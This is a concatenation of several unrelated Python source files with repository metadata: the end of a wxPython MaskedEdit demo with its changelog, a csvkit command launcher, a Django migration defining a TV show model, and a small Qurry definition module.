if control[6]: newControl.SetCtrlParameters(choiceRequired = True)
else:
newControl = MaskedComboBox( self.panel, -1, "",
choices = control[7],
choiceRequired = True,
mask = control[1],
formatcodes = control[3],
excludeChars = control[2],
includeChars = "",
validRegex = control[4],
validRange = control[5],
demo = True)
self.editList.append( newControl )
self.sizer.Add( newControl, row=rowcount,col=4,flag=wx.ALL,border=5)
rowcount += 1
self.sizer.AddGrowableCol(4)
self.panel.SetSizer(self.sizer)
self.panel.SetAutoLayout(1)
self.frame.Show(1)
self.MainLoop()
return True
def onClick(self, event):
self.frame.Close()
def onClickPage(self, event):
self.page2 = __test2(self.frame,-1,"")
self.page2.Show(True)
def _onCheck1(self,event):
""" Set required value on/off """
value = event.IsChecked()
if value:
for control in self.editList:
control.SetCtrlParameters(emptyInvalid=True)
control.Refresh()
else:
for control in self.editList:
control.SetCtrlParameters(emptyInvalid=False)
control.Refresh()
self.panel.Refresh()
def _onCheck2(self,event):
""" Highlight empty values"""
value = event.IsChecked()
if value:
for control in self.editList:
control.SetCtrlParameters( emptyBackgroundColour = 'Aquamarine')
control.Refresh()
else:
for control in self.editList:
control.SetCtrlParameters( emptyBackgroundColour = 'White')
control.Refresh()
self.panel.Refresh()
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
class __test2(wx.Frame):
def __init__(self, parent, id, caption):
wx.Frame.__init__( self, parent, id, "MaskedEdit control 0.0.7 Demo Page #2 -- AutoFormats", size = (550,600))
from wx.lib.rcsizer import RowColSizer
self.panel = wx.Panel( self, -1)
self.sizer = RowColSizer()
self.labels = []
self.texts = []
rowcount = 4
label = """\
All these controls have been created by passing a single parameter, the AutoFormat code.
The class contains an internal dictionary of types and formats (autoformats).
To see a great example of validations in action, try entering a bad email address, then tab out."""
self.label1 = wx.StaticText( self.panel, -1, label)
self.label2 = wx.StaticText( self.panel, -1, "Description")
self.label3 = wx.StaticText( self.panel, -1, "AutoFormat Code")
self.label4 = wx.StaticText( self.panel, -1, "MaskedEdit Control")
self.label1.SetForegroundColour("Blue")
self.label2.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label3.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.label4.SetFont(wx.Font(9,wx.SWISS,wx.NORMAL,wx.BOLD))
self.sizer.Add( self.label1, row=1,col=0,colspan=3, flag=wx.ALL,border=5)
self.sizer.Add( self.label2, row=3,col=0, flag=wx.ALL,border=5)
self.sizer.Add( self.label3, row=3,col=1, flag=wx.ALL,border=5)
self.sizer.Add( self.label4, row=3,col=2, flag=wx.ALL,border=5)
id, id1 = wx.NewId(), wx.NewId()
self.command1 = wx.Button( self.panel, id, "&Close")
self.command2 = wx.Button( self.panel, id1, "&Print Formats")
self.panel.Bind(wx.EVT_BUTTON, self.onClick, self.command1)
self.panel.SetDefaultItem(self.command1)
self.panel.Bind(wx.EVT_BUTTON, self.onClickPrint, self.command2)
# The following list is of the controls for the demo. Feel free to play around with
# the options!
controls = [
("Phone No","USPHONEFULLEXT"),
("US Date + Time","USDATETIMEMMDDYYYY/HHMM"),
("US Date MMDDYYYY","USDATEMMDDYYYY/"),
("Time (with seconds)","TIMEHHMMSS"),
("Military Time\n(without seconds)","24HRTIMEHHMM"),
("Social Sec#","USSOCIALSEC"),
("Credit Card","CREDITCARD"),
("Expiration MM/YY","EXPDATEMMYY"),
("Percentage","PERCENT"),
("Person's Age","AGE"),
("US Zip Code","USZIP"),
("US Zip+4","USZIPPLUS4"),
("Email Address","EMAIL"),
("IP Address", "(derived control IpAddrCtrl)")
]
for control in controls:
self.sizer.Add( wx.StaticText( self.panel, -1, control[0]),row=rowcount, col=0,border=5,flag=wx.ALL)
self.sizer.Add( wx.StaticText( self.panel, -1, control[1]),row=rowcount, col=1,border=5, flag=wx.ALL)
if control in controls[:-1]:
self.sizer.Add( MaskedTextCtrl( self.panel, -1, "",
autoformat = control[1],
demo = True),
row=rowcount,col=2,flag=wx.ALL,border=5)
else:
self.sizer.Add( IpAddrCtrl( self.panel, -1, "", demo=True ),
row=rowcount,col=2,flag=wx.ALL,border=5)
rowcount += 1
self.sizer.Add(self.command1, row=0, col=0, flag=wx.ALL, border = 5)
self.sizer.Add(self.command2, row=0, col=1, flag=wx.ALL, border = 5)
self.sizer.AddGrowableCol(3)
self.panel.SetSizer(self.sizer)
self.panel.SetAutoLayout(1)
def onClick(self, event):
self.Close()
def onClickPrint(self, event):
for format in masktags.keys():
sep = "+------------------------+"
print "%s\n%s \n Mask: %s \n RE Validation string: %s\n" % (sep,format, masktags[format]['mask'], masktags[format]['validRegex'])
## ---------- ---------- ---------- ---------- ---------- ---------- ----------
if __name__ == "__main__":
app = __test(False)
__i=0
##
## Current Issues:
## ===================================
##
## 1. WS: For some reason I don't understand, the control is generating two (2)
## EVT_TEXT events for every one (1) .SetValue() of the underlying control.
## I've been unsuccessful in determining why or in my efforts to make just one
## occur. So, I've added a hack to save the last seen value from the
## control in the EVT_TEXT handler, and if *different*, call event.Skip()
## to propagate it down the event chain, and let the application see it.
##
## 2. WS: MaskedComboBox is deficient in several areas, all having to do with the
## behavior of the underlying control that I can't fix. The problems are:
## a) The background coloring doesn't work in the text field of the control;
## instead, there's a only border around it that assumes the correct color.
## b) The control will not pass WXK_TAB to the event handler, no matter what
## I do, and there's no style wxCB_PROCESS_TAB like wxTE_PROCESS_TAB to
## indicate that we want these events. As a result, MaskedComboBox
## doesn't do the nice field-tabbing that MaskedTextCtrl does.
## c) Auto-complete had to be reimplemented for the control because programmatic
## setting of the value of the text field does not set up the auto complete
## the way that the control processing keystrokes does. (But I think I've
## implemented a fairly decent approximation.) Because of this the control
## also won't auto-complete on dropdown, and there's no event I can catch
## to work around this problem.
## d) There is no method provided for getting the selection; the hack I've
## implemented has its flaws, not the least of which is that due to the
## strategy that I'm using, the paste buffer is always replaced by the
## contents of the control's selection when in focus, on each keystroke;
## this makes it impossible to paste anything into a MaskedComboBox
## at the moment... :-(
## e) The other deficient behavior, likely induced by the workaround for (d),
## is that you can can't shift-left to select more than one character
## at a time.
##
##
## 3. WS: Controls on wxPanels don't seem to pass Shift-WXK_TAB to their
## EVT_KEY_DOWN or EVT_CHAR event handlers. Until this is fixed in
## wxWindows, shift-tab won't take you backwards through the fields of
## a MaskedTextCtrl like it should. Until then Shifted arrow keys will
## work like shift-tab and tab ought to.
##
## To-Do's:
## =============================##
## 1. Add Popup list for auto-completable fields that simulates combobox on individual
## fields. Example: City validates against list of cities, or zip vs zip code list.
## 2. Allow optional monetary symbols (eg. $, pounds, etc.) at front of a "decimal"
## control.
## 3. Fix shift-left selection for MaskedComboBox.
## 5. Transform notion of "decimal control" to be less "entire control"-centric,
## so that monetary symbols can be included and still have the appropriate
## semantics. (Big job, as currently written, but would make control even
## more useful for business applications.)
## CHANGELOG:
## ====================
## Version 1.13
## 1. Added parameter option stopFieldChangeIfInvalid, which can be used to relax the
## validation rules for a control, but make best efforts to stop navigation out of
## that field should its current value be invalid. Note: this does not prevent the
## value from remaining invalid if focus for the control is lost, via mousing etc.
##
## Version 1.12
## 1. Added proper support for NUMPAD keypad keycodes for navigation and control.
##
## Version 1.11
## 1. Added value member to ValueError exceptions, so that people can catch them
## and then display their own errors, and added attribute raiseOnInvalidPaste,
## so one doesn't have to subclass the controls simply to force generation of
## a ValueError on a bad paste operation.
## 2. Fixed handling of unicode charsets by converting to explicit control char
## set testing for passing those keystrokes to the base control, and then
## changing the semantics of the * maskchar to indicate any visible char.
## 3. Added '|' mask specification character, which allows splitting of contiguous
## mask characters into separate fields, allowing finer control of behavior
## of a control.
##
##
## Version 1.10
## 1. Added handling for WXK_DELETE and WXK_INSERT, such that shift-delete
## cuts, shift-insert pastes, and ctrl-insert copies.
##
## Version 1.9
## 1. Now ignores kill focus events when being destroyed.
## 2. Added missing call to set insertion point on changing fields.
## 3. Modified SetKeyHandler() to accept None as means of removing one.
## 4. Fixed keyhandler processing for group and decimal character changes.
## 5. Fixed a problem that prevented input into the integer digit of a
## integerwidth=1 numctrl, if the current value was 0.
## 6. Fixed logic involving processing of "_signOk" flag, to remove default
## sign key handlers if false, so that SetAllowNegative(False) in the
## NumCtrl works properly.
## 7. Fixed selection logic for numeric controls so that if selectOnFieldEntry
## is true, and the integer portion of an integer format control is selected
## and the sign position is selected, the sign keys will always result in a
## negative value, rather than toggling the previous sign.
##
##
## Version 1.8
## 1. Fixed bug involving incorrect variable name, causing combobox autocomplete to fail.
## 2. Added proper support for unicode version of wxPython
## 3. Added * as mask char meaning "all ansi chars" (ordinals 32-255).
## 4. Converted doc strings to use reST format, for ePyDoc documentation.
## 5. Renamed helper functions, classes, etc. not intended to be visible in public
## interface to code.
##
## Version 1.7
## 1. Fixed intra-right-insert-field erase, such that it doesn't leave a hole, but instead
## shifts the text to the left accordingly.
## 2. Fixed _SetValue() to place cursor after last character inserted, rather than end of
## mask.
## 3. Fixed some incorrect undo behavior for right-insert fields, and allowed derived classes
## (eg. numctrl) to pass modified values for undo processing (to handle/ignore grouping
## chars properly.)
## 4. Fixed autoselect behavior to work similarly to (2) above, so that combobox
## selection will only select the non-empty text, as per request.
## 5. Fixed tabbing to work with 2.5.2 semantics.
## 6. Fixed size calculation to handle changing fonts
##
## Version 1.6
## 1. Reorganized masked controls into separate package, renamed things accordingly
## 2. Split actual controls out of this file into their own files.
## Version 1.5
## (Reported) bugs fixed:
## 1. Crash ensues if you attempt to change the mask of a read-only
## MaskedComboBox after initial construction.
## 2. Changed strategy of defining Get/Set property functions so that
## these are now generated dynamically at runtime, rather than as
## part of the class definition. (This makes it possible to have
## more general base classes that have many more options for configuration
## without requiring that derivations support the same options.)
## 3. Fixed IsModified for _Paste() and _OnErase().
##
## Enhancements:
## 1. Fixed "attribute function inheritance," since base control is more
## generic than subsequent derivations, not all property functions of a
## generic control should be exposed in those derivations. New strategy
## uses base control classes (eg. BaseMaskedTextCtrl) that should be
## used to derive new class types, and mixed with their own mixins to
## only expose those attributes from the generic masked controls that
## make sense for the derivation. (This makes Boa happier.)
## 2. Renamed (with b-c) MILTIME autoformats to 24HRTIME, so as to be less
## "parochial."
##
## Version 1.4
## (Reported) bugs fixed:
## 1. Right-click menu allowed "cut" operation that destroyed mask
## (was implemented by base control)
## 2. MaskedComboBox didn't allow .Append() of mixed-case values; all
## got converted to lower case.
## 3. MaskedComboBox selection didn't deal with spaces in values
## properly when autocompleting, and didn't have a concept of "next"
## match for handling choice list duplicates.
## 4. Size of MaskedComboBox was always default.
## 5. Email address regexp allowed some "non-standard" things, and wasn't
## general enough.
## 6. Couldn't easily reset MaskedComboBox contents programmatically.
## 7. Couldn't set emptyInvalid during construction.
## 8. Under some versions of wxPython, readonly comboboxes can apparently
## return a GetInsertionPoint() result (655535), causing masked control
## to fail.
## 9. Specifying an empty mask caused the controls to traceback.
## 10. Can't specify float ranges for validRange.
## 11. '.' from within a the static portion of a restricted IP address
## destroyed the mask from that point rightward; tab when cursor is
## before 1st field takes cursor past that field.
##
## Enhancements:
## 12. Added Ctrl-Z/Undo handling, (and implemented context-menu properly.)
## 13. Added auto-select option on char input for masked controls with
## choice lists.
## 14. Added '>' formatcode, allowing insert within a given or each field
## as appropriate, rather than requiring "overwrite". This makes single
## field controls that just have validation rules (eg. EMAIL) much more
## friendly. The same flag controls left shift when deleting vs just
## blanking the value, and for right-insert fields, allows right-insert
## at any non-blank (non-sign) position in the field.
## 15. Added option to use to indicate negative values for numeric controls.
## 16. Improved OnFocus handling of numeric controls.
## 17. Enhanced Home/End processing to allow operation on a field level,
## using ctrl key.
## 18. Added individual Get/Set functions for control parameters, for
## simplified integration with Boa Constructor.
## 19. Standardized "Colour" parameter names to match wxPython, with
## non-british spellings still supported for backward-compatibility.
## 20. Added '&' mask specification character for punctuation only (no letters
## or digits).
## 21. Added (in a separate file) wx.MaskedCtrl() factory function to provide
## unified interface to the masked edit subclasses.
##
##
## Version 1.3
## 1. Made it possible to configure grouping, decimal and shift-decimal characters,
## to make controls more usable internationally.
## 2. Added code to smart "adjust" value strings presented to .SetValue()
## for right-aligned numeric format controls if they are shorter than
## than the control width, prepending the missing portion, prepending control
## template left substring for the missing characters, so that setting
## numeric values is easier.
## 3. Renamed SetMaskParameters SetCtrlParameters() (with old name preserved
## for b-c), as this makes more sense.
##
## Version 1.2
## 1. Fixed .SetValue() to replace the current value, rather than the current
## selection. Also changed it to generate ValueError if presented with
## either a value which doesn't follow the format or won't fit. Also made
## set value adjust numeric and date controls as if user entered the value.
## Expanded doc explaining how SetValue() works.
## 2. Fixed EUDATE* autoformats, fixed IsDateType mask list, and added ability to
## use 3-char months for dates, and EUDATETIME, and EUDATEMILTIME autoformats.
## 3. Made all date autoformats automatically pick implied "datestyle".
## 4. Added IsModified override, since base wx.TextCtrl never reports modified if
## .SetValue used to change the value, which is what the masked edit controls
## use internally.
## 5. Fixed bug in date position adjustment on 2 to 4 digit date conversion when
## using tab to "leave field" and auto-adjust.
## 6. Fixed bug in _isCharAllowed() for negative number insertion on pastes,
## and bug in ._Paste() that didn't account for signs in signed masks either.
## 7. Fixed issues with _adjustPos for right-insert fields causing improper
## selection/replacement of values
## 8. Fixed _OnHome handler to properly handle extending current selection to
## beginning of control.
## 9. Exposed all (valid) autoformats to demo, binding descriptions to
## autoformats.
## 10. Fixed a couple of bugs in email regexp.
## 11. Made maskchardict an instance var, to make mask chars to be more
## amenable to international use.
## 12. Clarified meaning of '-' formatcode in doc.
## 13. Fixed a couple of coding bugs being flagged by Python2.1.
## 14. Fixed several issues with sign positioning, erasure and validity
## checking for "numeric" masked controls.
## 15. Added validation to IpAddrCtrl.SetValue().
##
## Version 1.1
## 1. Changed calling interface to use boolean "useFixedWidthFont" (True by default)
## vs. literal font facename, and use wxTELETYPE as the font family
## if so specified.
## 2. Switched to use of dbg module vs. locally defined version.
## 3. Revamped entire control structure to use Field classes to hold constraint
## and formatting data, to make code more hierarchical, allow for more
## sophisticated masked edit construction.
## 4. Better strategy for managing options, and better validation on keywords.
## 5. Added 'V' format code, which requires that in order for a character
## to be accepted, it must result in a string that passes the validRegex.
## 6. Added 'S' format code which means "select entire field when navigating
## to new field."
## 7. Added 'r' format code to allow "right-insert" fields. (implies 'R'--right-alignment)
## 8. Added '<' format code to allow fields to require explicit cursor movement
## to leave field.
## 9. Added validFunc option to other validation mechanisms, that allows derived
## classes to add dynamic validation constraints to the control.
## 10. Fixed bug in validatePaste code causing possible IndexErrors, and also
## fixed failure to obey case conversion codes when pasting.
## 11. Implemented '0' (zero-pad) formatting code, as it wasn't being done anywhere...
## 12. Removed condition from OnDecimalPoint, so that it always truncates right on '.'
## 13. Enhanced IpAddrCtrl to use right-insert fields, selection on field traversal,
## individual field validation to prevent field values > 255, and require explicit
## tab/. to change fields.
## 14. Added handler for left double-click to select field under cursor.
## 15. Fixed handling for "Read-only" styles.
## 16. Separated signedForegroundColor from 'R' style, and added foregroundColor
## attribute, for more consistent and controllable coloring.
## 17. Added retainFieldValidation parameter, allowing top-level constraints
## such as "validRequired" to be set independently of field-level equivalent.
## (needed in TimeCtrl for bounds constraints.)
## 18. Refactored code a bit, cleaned up and commented code more heavily, fixed
## some of the logic for setting/resetting parameters, eg. fillChar, defaultValue,
## etc.
## 19. Fixed maskchar setting for upper/lowercase, to work in all locales.
##
##
## Version 1.0
## 1. Decimal point behavior restored for decimal and integer type controls:
## decimal point now trucates the portion > 0.
## 2. Return key now works like the tab character and moves to the next field,
## provided no default button is set for the form panel on which the control
## resides.
## 3. Support added in _FindField() for subclasses controls (like timecontrol)
## to determine where the current insertion point is within the mask (i.e.
## which sub-'field'). See method documentation for more info and examples.
## 4. Added Field class and support for all constraints to be field-specific
## in addition to being globally settable for the control.
## Choices for each field are validated for length and pastability into
## the field in question, raising ValueError if not appropriate for the control.
## Also added selective additional validation based on individual field constraints.
## By default, SHIFT-WXK_DOWN, SHIFT-WXK_UP, WXK_PRIOR and WXK_NEXT all
## auto-complete fields with choice lists, supplying the 1st entry in
## the choice list if the field is empty, and cycling through the list in
## the appropriate direction if already a match. WXK_DOWN will also auto-
## complete if the field is partially completed and a match can be made.
## SHIFT-WXK_UP/DOWN will also take you to the next field after any
## auto-completion performed.
## 5. Added autoCompleteKeycodes=[] parameters for allowing further
## customization of the control. Any keycode supplied as a member
## of the _autoCompleteKeycodes list will be treated like WXK_NEXT. If
## requireFieldChoice is set, then a valid value from each non-empty
## choice list will be required for the value of the control to validate.
## 6. Fixed "auto-sizing" to be relative to the font actually used, rather
## than making assumptions about character width.
## 7. Fixed GetMaskParameter(), which was non-functional in previous version.
## 8. Fixed exceptions raised to provide info on which control had the error.
## 9. Fixed bug in choice management of MaskedComboBox.
## 10. Fixed bug in IpAddrCtrl causing traceback if field value was of
## the form '# #'. Modified control code for IpAddrCtrl so that '.'
## in the middle of a field clips the rest of that field, similar to
## decimal and integer controls.
##
##
## Version 0.0.7
## 1. "-" is a toggle for sign; "+" now changes - signed numerics to positive.
## 2. ',' in formatcodes now causes numeric values to be comma-delimited (e.g.333,333).
## 3. New support for selecting text within the control.(thanks Will Sadkin!)
## Shift-End and Shift-Home now select text as you would expect
## Control-Shift-End selects to the end of the mask string, even if value not entered.
## Control-A selects all *entered* text, Shift-Control-A selects everything in the control.
## 4. event.Skip() added to onKillFocus to correct remnants when running in Linux (contributed-
## for some reason I couldn't find the original email but thanks!!!)
## 5. All major key-handling code moved to their own methods for easier subclassing: OnHome,
## OnErase, OnEnd, OnCtrl_X, OnCtrl_A, etc.
## 6. Email and autoformat validations corrected using regex provided by Will Sadkin (thanks!).
## (The rest of the changes in this version were done by Will Sadkin with permission from Jeff...)
## 7. New mechanism for replacing default behavior for any given key, using
## ._SetKeycodeHandler(keycode, func) and ._SetKeyHandler(char, func) now available
## for easier subclassing of the control.
## 8. Reworked the delete logic, cut, paste and select/replace logic, as well as some bugs
## with insertion point/selection modification. Changed Ctrl-X to use standard "cut"
## semantics, erasing the selection, rather than erasing the entire control.
## 9. Added option for an "default value" (ie. the template) for use when a single fillChar
## is not desired in every position. Added IsDefault() function to mean "does the value
## equal the template?" and modified .IsEmpty() to mean "do all of the editable
## positions in the template == the fillChar?"
## 10. Extracted mask logic into mixin, so we can have both MaskedTextCtrl and MaskedComboBox,
## now included.
## 11. MaskedComboBox now adds the capability to validate from list of valid values.
## Example: City validates against list of cities, or zip vs zip code list.
## 12. Fixed oversight in EVT_TEXT handler that prevented the events from being
## passed to the next handler in the event chain, causing updates to the
## control to be invisible to the parent code.
## 13. Added IPADDR autoformat code, and subclass IpAddrCtrl for controlling tabbing within
## the control, that auto-reformats as you move between cells.
## 14. Mask characters [A,a,X,#] can now appear in the format string as literals, by using '\'.
## 15. It is now possible to specify repeating masks, e.g. #{3}-#{3}-#{14}
## 16. Fixed major bugs in date validation, due to the fact that
## wxDateTime.ParseDate is too liberal, and will accept any form that
## makes any kind of sense, regardless of the datestyle you specified
## for the control. Unfortunately, the strategy used to fix it only
## works for versions of wxPython post 2.3.3.1, as a C++ assert box
## seems to show up on an invalid date otherwise, instead of a catchable
## exception.
## 17. Enhanced date adjustment to automatically adjust heuristic based on
## current year, making last century/this century determination on
## 2-digit year based on distance between today's year and value;
## if > 50 year separation, assume last century (and don't assume last
## century is 20th.)
## 18. Added autoformats and support for including HHMMSS as well as HHMM for
## date times, and added similar time, and militaray time autoformats.
## 19. Enhanced tabbing logic so that tab takes you to the next field if the
## control is a multi-field control.
## 20. Added stub method called whenever the control "changes fields", that
## can be overridden by subclasses (eg. IpAddrCtrl.)
## 21. Changed a lot of code to be more functionally-oriented so side-effects
## aren't as problematic when maintaining code and/or adding features.
## Eg: IsValid() now does not have side-effects; it merely reflects the
## validity of the value of the control; to determine validity AND recolor
## the control, _CheckValid() should be used with a value argument of None.
## Similarly, made most reformatting function take an optional candidate value
## rather than just using the current value of the control, and only
## have them change the value of the control if a candidate is not specified.
## In this way, you can do validation *before* changing the control.
## 22. Changed validRequired to mean "disallow chars that result in invalid
## value." (Old meaning now represented by emptyInvalid.) (This was
## possible once I'd made the changes in (19) above.)
## 23. Added .SetMaskParameters and .GetMaskParameter methods, so they
## can be set/modified/retrieved after construction. Removed individual
## parameter setting functions, in favor of this mechanism, so that
## all adjustment of the control based on changing parameter values can
## be handled in one place with unified mechanism.
## 24. Did a *lot* of testing and fixing re: numeric values. Added ability
## to type "grouping char" (ie. ',') and validate as appropriate.
## 25. Fixed ZIPPLUS4 to allow either 5 or 4, but if > 5 must be 9.
## 26. Fixed assumption about "decimal or integer" masks so that they're only
## made iff there's no validRegex associated with the field. (This
## is so things like zipcodes which look like integers can have more
## restrictive validation (ie. must be 5 digits.)
## 27. Added a ton more doc strings to explain use and derivation requirements
## and did regularization of the naming conventions.
## 28. Fixed a range bug in _adjustKey preventing z from being handled properly.
## 29. Changed behavior of '.' (and shift-.) in numeric controls to move to
## reformat the value and move the next field as appropriate. (shift-'.',
## ie. '>' moves to the previous field.
## Version 0.0.6
## 1. Fixed regex bug that caused autoformat AGE to invalidate any age ending
## in '0'.
## 2. New format character 'D' to trigger date type. If the user enters 2 digits in the
## year position, the control will expand the value to four digits, using numerals below
## 50 as 21st century (20+nn) and less than 50 as 20th century (19+nn).
## Also, new optional parameter datestyle = set to one of {MDY|DMY|YDM}
## 3. revalid parameter renamed validRegex to conform to standard for all validation
## parameters (see 2 new ones below).
## 4. New optional init parameter = validRange. Used only for int/dec (numeric) types.
## Allows the developer to specify a valid low/high range of values.
## 5. New optional init parameter = validList. Used for character types. Allows developer
## to send a list of values to the control to be used for specific validation.
## See the Last Name Only example - it is list restricted to Smith/Jones/Williams.
## 6. Date type fields now use wxDateTime's parser to validate the date and time.
## This works MUCH better than my kludgy regex!! Thanks to Robin Dunn for pointing
## me toward this solution!
## 7. Date fields now automatically expand 2-digit years when it can. For example,
## if the user types "03/10/67", then "67" will auto-expand to "1967". If a two-year
## date is entered it will be expanded in any case when the user tabs out of the
## field.
## 8. New class functions: SetValidBackgroundColor, SetInvalidBackgroundColor, SetEmptyBackgroundColor,
## SetSignedForeColor allow accessto override default class coloring behavior.
## 9. Documentation updated and improved.
## 10. Demo - page 2 is now a wxFrame class instead of a wxPyApp class. Works better.
## Two new options (checkboxes) - test highlight empty and disallow empty.
## 11. Home and End now work more intuitively, moving to the first and last user-entry
## value, respectively.
## 12. New class function: SetRequired(bool). Sets the control's entry required flag
## (i.e. disallow empty values if True).
##
## Version 0.0.5
## 1. get_plainValue method renamed to GetPlainValue following the wxWindows
## StudlyCaps(tm) standard (thanks Paul Moore). ;)
## 2. New format code 'F' causes the control to auto-fit (auto-size) itself
## based on the length of the mask template.
## 3. Class now supports "autoformat" codes. These can be passed to the class
## on instantiation using the parameter autoformat="code". If the code is in
## the dictionary, it will self set the mask, formatting, and validation string.
## I have included a number of samples, but I am hoping that someone out there
## can help me to define a whole bunch more.
## 4. I have added a second page to the demo (as well as a second demo class, test2)
## to showcase how autoformats work. The way they self-format and self-size is,
## I must say, pretty cool.
## 5. Comments added and some internal cosmetic revisions re: matching the code
## standards for class submission.
## 6. Regex validation is now done in real time - field turns yellow immediately
## and stays yellow until the entered value is valid
## 7. Cursor now skips over template characters in a more intuitive way (before the
## next keypress).
## 8. Change, Keypress and LostFocus methods added for convenience of subclasses.
## Developer may use these methods which will be called after EVT_TEXT, EVT_CHAR,
## and EVT_KILL_FOCUS, respectively.
## 9. Decimal and numeric handlers have been rewritten and now work more intuitively.
##
## Version 0.0.4
## 1. New .IsEmpty() method returns True if the control's value is equal to the
## blank template string
## 2. Control now supports a new init parameter: revalid. Pass a regular expression
## that the value will have to match when the control loses focus. If invalid,
## the control's BackgroundColor will turn yellow, and an internal flag is set (see next).
## 3. Demo now shows revalid functionality. Try entering a partial value, such as a
## partial social security number.
## 4. New .IsValid() value returns True if the control is empty, or if the value matches
## the revalid expression. If not, .IsValid() returns False.
## 5. Decimal values now collapse to decimal with '.00' on losefocus if the user never
## presses the decimal point.
## 6. Cursor now goes to the beginning of the field if the user clicks in an
## "empty" field intead of leaving the insertion point in the middle of the
## field.
## 7. New "N" mask type includes upper and lower chars plus digits. a-zA-Z0-9.
## 8. New formatcodes init parameter replaces other init params and adds functions.
## String passed to control on init controls:
## _ Allow spaces
## ! Force upper
## ^ Force lower
## R Show negative #s in red
## , Group digits
## - Signed numerals
## 0 Numeric fields get leading zeros
## 9. Ctrl-X in any field clears the current value.
## 10. Code refactored and made more modular (esp in OnChar method). Should be more
## easy to read and understand.
## 11. Demo enhanced.
## 12. Now has _doc_.
##
## Version 0.0.3
## 1. GetPlainValue() now returns the value without the template characters;
## so, for example, a social security number (123-33-1212) would return as
## 123331212; also removes white spaces from numeric/decimal values, so
## "- 955.32" is returned "-955.32". Press ctrl-S to see the plain value.
## 2. Press '.' in an integer style masked control and truncate any trailing digits.
## 3. Code moderately refactored. Internal names improved for clarity. Additional
## internal documentation.
## 4. Home and End keys now supported to move cursor to beginning or end of field.
## 5. Un-signed integers and decimals now supported.
## 6. Cosmetic improvements to the demo.
## 7. Class renamed to MaskedTextCtrl.
## 8. Can now specify include characters that will override the basic
## controls: for example, includeChars = "@." for email addresses
## 9. Added mask character 'C' -> allow any upper or lowercase character
## 10. .SetSignColor(str:color) sets the foreground color for negative values
## in signed controls (defaults to red)
## 11. Overview documentation written.
##
## Version 0.0.2
## 1. Tab now works properly when pressed in last position
## 2. Decimal types now work (e.g. #####.##)
## 3. Signed decimal or numeric values supported (i.e. negative numbers)
## 4. Negative decimal or numeric values now can show in red.
## 5. Can now specify an "exclude list" with the excludeChars parameter.
## See date/time formatted example - you can only enter A or P in the
## character mask space (i.e. AM/PM).
## 6. Backspace now works properly, including clearing data from a selected
## region but leaving template characters intact. Also delete key.
## 7. Left/right arrows now work properly.
## 8. Removed EventManager call from test so demo should work with wxPython 2.3.3
##
| [
"RD@c3d73ce0-8a6f-49c7-b76d-6d57e0e08775"
] | RD@c3d73ce0-8a6f-49c7-b76d-6d57e0e08775 |
2d2113c43a965b1556bcdf535ced30eea8d3734f | 46b5c1bc98678f02cbd39b6c814e6b32908a6c22 | /venv/bin/csvlook | c02dbd9fedc446b3516fcaab1177f4e2063e9e8e | [] | no_license | Peter-32/portofvirginiaapp | ea0aceedce6efe928f4c128fb4935f000048678f | e0cfdd379d9654d41b301a52bcd6d77aa08d4591 | refs/heads/master | 2022-11-07T15:13:51.111003 | 2019-07-24T05:15:57 | 2019-07-24T05:15:57 | 198,562,849 | 0 | 1 | null | 2022-10-08T03:46:30 | 2019-07-24T05:13:23 | Python | UTF-8 | Python | false | false | 304 | #!/Users/petermyers/Desktop/Code/test_pyinstaller2/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from csvkit.utilities.csvlook import launch_new_instance
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(launch_new_instance())
| [
"peter@impactradius.com"
] | peter@impactradius.com | |
1bd639ff67bbc8cd8cc937c885b0d31a4cacaf7d | c5cdb85c122c32165a0a00428ab85c03bc5d8fa6 | /Week3/day2/tv_shows/application/migrations/0001_initial.py | 723c8528775c0927ca23fb7c84e04b09bf37b34a | [] | no_license | sadieBoBadie/Dec2020Python | 70f841aff0b816a0cbf5519418d0c6ce14b90729 | 595aeea4092c8962c8a7e08fa757a0b8ddc8c897 | refs/heads/main | 2023-02-01T15:28:25.885585 | 2020-12-19T02:46:48 | 2020-12-19T02:46:48 | 317,356,502 | 0 | 9 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | # Generated by Django 2.2 on 2020-12-15 22:19
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Show',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('description', models.TextField()),
('network', models.CharField(max_length=255)),
('release_date', models.DateField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
],
),
]
| [
"sflick@codingdojo.com"
] | sflick@codingdojo.com |
a0ff0eb4f6ab02c8d96e79c6f9123bfb69ca2e08 | fa0e61d9cf6ace4c3198724afa9ddbc15ac8cd1f | /qurry/constructs/define.py | 24b6ee3b84556563203e76a8f48fcec008ed292f | [
"MIT"
] | permissive | nguyenducnhaty/Qurry | aa338877b8f72394a0165bdc2ab8838ff6386e34 | 9766cc8ea19d438d3408080bf584faab12537789 | refs/heads/master | 2020-05-28T08:05:39.762862 | 2019-04-03T18:45:41 | 2019-04-03T18:45:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 712 | py | from ..definitions import update_definitions
from ..datatype import Datatype
from pprint import pprint
def process_type(body, kernel):
if len(body) == 1:
body = body[0]
head, *rest = body
if head in kernel.definitions and isinstance(kernel.definitions[head], Datatype):
return kernel.definitions[head].__init__(*rest)
else:
raise ValueError('Cannot process type {}'.format(head))
def define(*expression, kernel=None):
name, *rest = expression
if name not in kernel.definitions:
kernel.definitions[name] = process_type(rest, kernel)
print(kernel.definitions)
else:
raise ValueError('{} is already defined'.format(name))
return ''
| [
"lucassaldyt@gmail.com"
] | lucassaldyt@gmail.com |
